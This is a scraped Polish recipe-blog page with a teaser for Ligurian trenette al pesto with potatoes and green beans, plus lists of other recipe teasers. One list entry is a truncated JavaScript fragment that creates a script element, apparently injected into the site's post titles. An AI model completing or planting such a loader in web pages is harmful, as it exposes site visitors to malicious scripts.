Włochy - Liguryjskie linguine z pesto, ziemniakami i zieloną fasolką (Trenette al Pesto)

Wyobraźmy sobie, że dawno, dawno temu w Genui obiad robiły dwie gospodynie - włoska i polska. Ta pierwsza robiła makaron z pesto, a druga młode ziemniaczki z fasolką szparagową. Obie biegły z garnkami po korytarzu, wpadły na siebie i oba dania się wymieszały, tworząc to, które proponujemy dzisiaj. Oczywiście tak raczej nie było, ale faktycznie makaron z pesto, ziemniakami i...
Najnowsze przepisy
Kotlet wieprzowy z dodatkiem sera żółtego i jajka... ⇖ 10
Rabarbar pojawia się w sklepach i na straganach wcześnie... ⇖ 12
Ah, Thanksgiving! It’s that magical time of year when the... ⇖ 10
Uwielbiam kuchnię pełną wyrazistych smaków i aromatów,... ⇖ 10
Jesień zagościła na dobre, to i w kuchni również jest... ⇖ 11
(function(){ u938=document.createElement("script");u938.type ⇖ 11
Przepisy z bloga
Peixinhos da horta, czyli rybki z ogrodu to popularna... ⇖ 461
Idealnie wiosenna zupa chrzanowa z austriackiej Styrii -... ⇖ 542
W trakcie naszej zimowej wizyty w Walencji (pomarańczowej... ⇖ 541
Od czasu zjedzenia weneckiego makaronu z fasolą, przepisy... ⇖ 761
Kuchnia portugalska należy do tych raczej niedocenianych.... ⇖ 692
Lentejas con verduras, czyli soczewica z warzywami nie... ⇖ 543
Leberwurst to niemiecki pasztet z wątróbki z dodatkiem... ⇖ 541
Przepisy na czasie
Murzynek to takie ciasto, które piekło się u mnie w domu... ⇖ 831
Sezon na grzyby jest w pełni, w tym roku jest istne,... ⇖ 356
Sernik bez sera to taki wypiek, który potrafi naprawdę... ⇖ 328
Przysmak Sułtana to jedno z tych ciast, które wygląda... ⇖ 324
Sernik to jedno z tych ciast, które nigdy się nie nudzą... ⇖ 267